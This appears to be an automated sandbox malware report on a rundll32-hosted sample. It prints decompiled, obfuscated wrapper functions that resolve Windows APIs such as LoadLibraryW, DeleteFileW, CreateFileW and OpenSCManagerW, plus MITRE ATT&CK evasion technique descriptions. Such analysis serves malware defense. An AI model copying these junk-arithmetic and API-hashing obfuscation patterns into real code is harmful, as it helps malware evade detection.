Analysis Process: rundll32.exe PID: 984 Parent PID: 4892 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	13.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1075
Total number of Limit Nodes:	11

Executed Functions

Function 04DF52B9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E04DF52B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t47;
				struct HINSTANCE__* _t59;
				signed int _t61;
				signed int _t62;
				WCHAR* _t68;

				_push(_a12);
				_t68 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04E0FE29(_t47);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x68392e;
				_v16 = 0xf5950b;
				_v16 = _v16 ^ 0xb3325752;
				_v16 = _v16 ^ 0xe58473b2;
				_v16 = _v16 ^ 0x56462a2c;
				_v8 = 0x3988bb;
				_t61 = 0x3a;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0xf338;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x0035ea14;
				_v12 = 0xe53120;
				_v12 = _v12 ^ 0xa236e8c8;
				_t62 = 0x62;
				_v12 = _v12 / _t62;
				_v12 = _v12 ^ 0x01ab7b97;
				_v20 = 0x973198;
				_v20 = _v20 * 0x60;
				_v20 = _v20 ^ 0x38bce55b;
				E04DFEB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
				_t59 = LoadLibraryW(_t68); // executed
				return _t59;
			}

0x04df52c0
0x04df52c3
0x04df52c5
0x04df52c8
0x04df52cc
0x04df52cd
0x04df52d2
0x04df52d9
0x04df52e2
0x04df52e9
0x04df52f0
0x04df52f7
0x04df52fe
0x04df530a
0x04df530f
0x04df5314
0x04df531b
0x04df531f
0x04df5326
0x04df532d
0x04df5337
0x04df533f
0x04df5342
0x04df5349
0x04df5360
0x04df5363
0x04df5376
0x04df537f
0x04df5385

APIs

LoadLibraryW.KERNEL32 ref: 04DF537F

Strings

1, xrefs: 04DF5326
,*FV, xrefs: 04DF52F7
.9h, xrefs: 04DF52D9

Memory Dump Source

Source File: 00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.250942894.0000000004DF0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.251032954.0000000004E16000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4df0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 1$,*FV$.9h
API String ID: 1029625771-1870595533
Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction ID: a1248d98778add8e0d16ea01eaed2bf9ea1d819d2685b73a83b2c8e388605ed6
Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction Fuzzy Hash: A52156B5D00208FBEF08DFA8D94A9EEBBB5FB40314F108198E915A6250D3B46B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04E11538, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E04E11538(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t59;
				int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;

				_push(_a4);
				E04E0FE29(_t59);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x73095a;
				_v28 = 0xd34a52;
				_v16 = 0xb3a153;
				_t77 = 0x73;
				_v16 = _v16 / _t77;
				_v16 = _v16 + 0x4fd2;
				_v16 = _v16 ^ 0xee3af97f;
				_v16 = _v16 ^ 0xee3510f4;
				_v20 = 0xee2064;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x88190a0a;
				_v12 = 0x72c7a5;
				_v12 = _v12 + 0x7839;
				_t78 = 0x77;
				_v12 = _v12 / _t78;
				_t79 = 0x76;
				_v12 = _v12 / _t79;
				_v12 = _v12 ^ 0x00040652;
				_v8 = 0x10c7fb;
				_t80 = 0x6c;
				_v8 = _v8 * 0x70;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x00c83f8f;
				E04DFEB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
				_t75 = FindCloseChangeNotification(_a4); // executed
				return _t75;
			}

0x04e1153e
0x04e11543
0x04e11548
0x04e1154f
0x04e11558
0x04e1155f
0x04e1156b
0x04e11570
0x04e11575
0x04e1157c
0x04e11583
0x04e1158a
0x04e11591
0x04e11595
0x04e1159c
0x04e115a3
0x04e115ad
0x04e115b2
0x04e115ba
0x04e115bf
0x04e115c4
0x04e115cb
0x04e115d6
0x04e115e6
0x04e115e9
0x04e115f3
0x04e115f6
0x04e1160a
0x04e11615
0x04e1161a

APIs

FindCloseChangeNotification.KERNEL32(00040652), ref: 04E11615

Strings

d , xrefs: 04E1158A
Zs, xrefs: 04E1154F

Memory Dump Source

Source File: 00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.250942894.0000000004DF0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.251032954.0000000004E16000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4df0000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: Zs$d
API String ID: 2591292051-3879001491
Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction ID: 8438476f5b22dc8eca40aab0357dd84a561e8e6d133657ff3a5b5ad3938b30ca
Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction Fuzzy Hash: 94212AB5E40209EBEB04DFA5D94999EBBB1EB50314F10C099E618BB290D7B96B548F80

Uniqueness

Uniqueness Score: -1.00%

Function 04DFD061, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E04DFD061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t69;

				_push(_a12);
				_t69 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04E0FE29(_t54);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xa62646;
				_v32 = 0x27199b;
				_v20 = 0x942c55;
				_v20 = _v20 | 0xf0368afe;
				_v20 = _v20 << 0xa;
				_v20 = _v20 ^ 0xfbcaf84d;
				_v20 = _v20 ^ 0x217d6c33;
				_v16 = 0xf28622;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 | 0xeb4a9877;
				_v16 = _v16 ^ 0x2aded5e4;
				_v16 = _v16 ^ 0xc19eb21f;
				_v12 = 0x4a5837;
				_v12 = _v12 ^ 0xa3e571b7;
				_v12 = _v12 + 0xffff6305;
				_t65 = 0x6e;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x01794185;
				_v8 = 0xa209ee;
				_v8 = _v8 + 0x62d2;
				_v8 = _v8 ^ 0x3d892cf6;
				_v8 = _v8 | 0x5ca7d1ce;
				_v8 = _v8 ^ 0x7da8dabc;
				E04DFEB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
				_t63 = DeleteFileW(_t69); // executed
				return _t63;
			}

0x04dfd068
0x04dfd06b
0x04dfd06d
0x04dfd070
0x04dfd074
0x04dfd075
0x04dfd07a
0x04dfd081
0x04dfd087
0x04dfd08e
0x04dfd095
0x04dfd09c
0x04dfd0a3
0x04dfd0a7
0x04dfd0ae
0x04dfd0b5
0x04dfd0bc
0x04dfd0c0
0x04dfd0c7
0x04dfd0ce
0x04dfd0d5
0x04dfd0dc
0x04dfd0e3
0x04dfd0ef
0x04dfd0f7
0x04dfd0fa
0x04dfd101
0x04dfd108
0x04dfd10f
0x04dfd116
0x04dfd11d
0x04dfd13c
0x04dfd145
0x04dfd14b

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04DFD145

Strings

3l}!, xrefs: 04DFD0AE
7XJ, xrefs: 04DFD0D5

Memory Dump Source

Source File: 00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.250942894.0000000004DF0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.251032954.0000000004E16000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4df0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: 3l}!$7XJ
API String ID: 4033686569-2205417827
Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction ID: cc7facfcea49eb10c6f7445a7ec9b90430a0d54728ccf429b0dece0ee484f809
Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction Fuzzy Hash: 4B2145B5D00318AFDF18DFA4C98A9DEFBB0FF14304F108188E966A6210D7B85B558F91

Uniqueness

Uniqueness Score: -1.00%

Function 04E145CA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E04E145CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t51;
				void* _t60;
				WCHAR* _t64;

				_push(_a48);
				_t64 = __ecx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E04E0FE29(_t51);
				_v28 = 0x204d4f;
				_v24 = 0;
				_v20 = 0xd27984;
				_v20 = _v20 | 0x43788b11;
				_v20 = _v20 ^ 0x43f3df42;
				_v16 = 0xf976f1;
				_v16 = _v16 + 0xffff3d74;
				_v16 = _v16 | 0xfc5c4419;
				_v16 = _v16 ^ 0xfcfdb6fc;
				_v12 = 0xb7df7c;
				_v12 = _v12 + 0xffff3658;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x1f30f970;
				_v12 = _v12 ^ 0x12ab006a;
				_v8 = 0x8ba8ca;
				_v8 = _v8 | 0x62aa166a;
				_v8 = _v8 + 0xa2f6;
				_v8 = _v8 * 0x55;
				_v8 = _v8 ^ 0xc33acf6c;
				E04DFEB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
				return _t60;
			}

0x04e145d2
0x04e145d7
0x04e145d9
0x04e145dc
0x04e145df
0x04e145e2
0x04e145e5
0x04e145e8
0x04e145eb
0x04e145ee
0x04e145f1
0x04e145f4
0x04e145f5
0x04e145f7
0x04e145f8
0x04e145fd
0x04e14607
0x04e1460a
0x04e14611
0x04e14618
0x04e1461f
0x04e14626
0x04e1462d
0x04e14634
0x04e1463b
0x04e14642
0x04e1465d
0x04e14660
0x04e14667
0x04e1466e
0x04e14675
0x04e1467c
0x04e14688
0x04e1468b
0x04e1469e
0x04e146b5
0x04e146bc

APIs

CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 04E146B5

Strings

OM , xrefs: 04E145FD

Memory Dump Source

Source File: 00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.250942894.0000000004DF0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.251032954.0000000004E16000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4df0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: OM
API String ID: 823142352-4198367855
Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction ID: e2934d7aec6ad01418ccc133abdd018c7596d7d5b819ebeaf1b7d3581ad65233
Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction Fuzzy Hash: D521EE72801249BBCF15DFA9CD45CDEBFB5EF88304F518199F914A6220D3768A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 04E0648A, Relevance: 1.6, APIs: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E04E0648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				void* _t49;
				long _t52;

				_push(_a16);
				_t52 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04E0FE29(_t41);
				_v12 = 0x3cd3f;
				_v12 = _v12 << 3;
				_v12 = _v12 | 0xc677f757;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0188bcff;
				_v20 = 0x40fc9e;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x040306b1;
				_v16 = 0x159e9f;
				_v16 = _v16 + 0xffffd0d5;
				_v16 = _v16 * 0x33;
				_v16 = _v16 ^ 0x04433238;
				_v8 = 0x8a430d;
				_v8 = _v8 + 0xffffdfbc;
				_v8 = _v8 | 0x5356d001;
				_v8 = _v8 + 0x638e;
				_v8 = _v8 ^ 0x53d0144a;
				E04DFEB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
				return _t49;
			}

0x04e06491
0x04e06494
0x04e06496
0x04e06499
0x04e0649c
0x04e064a0
0x04e064a1
0x04e064a6
0x04e064b0
0x04e064b4
0x04e064bb
0x04e064bf
0x04e064c6
0x04e064cd
0x04e064d1
0x04e064d8
0x04e064df
0x04e064fa
0x04e064fd
0x04e06504
0x04e0650b
0x04e06512
0x04e06519
0x04e06520
0x04e06534
0x04e06543
0x04e06549

APIs

RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 04E06543

Memory Dump Source

Source File: 00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.250942894.0000000004DF0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.251032954.0000000004E16000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4df0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction ID: dc493e08ed5ce62b7974ac84a07ae1fa7c6972f5502fd8a1222489c09963786a
Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction Fuzzy Hash: C81100B2C0121DFBDF06DFA5D9098CEBBB4FB00314F108598E921A6260E3B59B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 04E0E8B6, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E04E0E8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t29;
				void* _t37;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E04E0FE29(_t29);
				_v20 = 0xc8e76b;
				_v20 = _v20 | 0x270203a1;
				_v20 = _v20 ^ 0x27c97096;
				_v16 = 0x55aebc;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00171a80;
				_v12 = 0xfad6fe;
				_v12 = _v12 ^ 0xd14a4d1d;
				_v12 = _v12 ^ 0xd1b10da7;
				_v8 = 0x428060;
				_v8 = _v8 * 0x54;
				_v8 = _v8 ^ 0x15de1a76;
				E04DFEB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
				_t37 = OpenSCManagerW(0, 0, _a12); // executed
				return _t37;
			}

0x04e0e8bd
0x04e0e8c2
0x04e0e8c5
0x04e0e8c6
0x04e0e8ca
0x04e0e8cb
0x04e0e8d0
0x04e0e8da
0x04e0e8e1
0x04e0e8e8
0x04e0e8ef
0x04e0e8f3
0x04e0e8fa
0x04e0e901
0x04e0e908
0x04e0e90f
0x04e0e92a
0x04e0e92d
0x04e0e941
0x04e0e94e
0x04e0e954

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 04E0E94E

Memory Dump Source

Source File: 00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.250942894.0000000004DF0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.251032954.0000000004E16000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4df0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction ID: 17f6e2cbfcaba397a36b0be48350410ec35b6b7461fed7ce9f577770324e6b5d
Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction Fuzzy Hash: 4A11237190221DFB9B04EFE89D468DFBFB8FF04308F118588E925B2211D3B19B149BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04E0D11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E0D11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E04DFEB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x04e0d120
0x04e0d124
0x04e0d12b
0x04e0d132
0x04e0d139
0x04e0d140
0x04e0d144
0x04e0d14b
0x04e0d14f
0x04e0d156
0x04e0d15d
0x04e0d164
0x04e0d16b
0x04e0d172
0x04e0d176
0x04e0d17d
0x04e0d184
0x04e0d18b
0x04e0d1ac
0x04e0d1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 04E0D1B6

Memory Dump Source

Source File: 00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.250942894.0000000004DF0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.251032954.0000000004E16000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4df0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 0ecae1b3db1edbd26b630a2f89579a90c897bec5ea53f6a842fcf24664bface8
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 681112B1C4030CEBDB54DFE5D94A6DEFBB0EB00708F108588D521B6250D3B89B489F90

Uniqueness

Uniqueness Score: -1.00%

Function 04E1061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E04E1061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04E0FE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E04DFEB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x04e10624
0x04e10627
0x04e10629
0x04e1062c
0x04e1062f
0x04e10630
0x04e10631
0x04e10636
0x04e1063d
0x04e10644
0x04e1064b
0x04e1064f
0x04e10667
0x04e1066a
0x04e10671
0x04e10678
0x04e1067f
0x04e1068b
0x04e1068e
0x04e10695
0x04e1069c
0x04e106a3
0x04e106aa
0x04e106b1
0x04e106b8
0x04e106bf
0x04e106c6
0x04e106d9
0x04e106e5
0x04e106eb

APIs

lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04E106E5

Memory Dump Source

Source File: 00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.250942894.0000000004DF0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.251032954.0000000004E16000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4df0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: af9183da8664fab15b1a8fae00778e2f8c36798faf23d9e4faa1cf52f7aff5dd
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: ED2110B1C01309ABCF14DFA9D9899DEBFB5FB20354F108298E529A6251D3B49B04CFA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

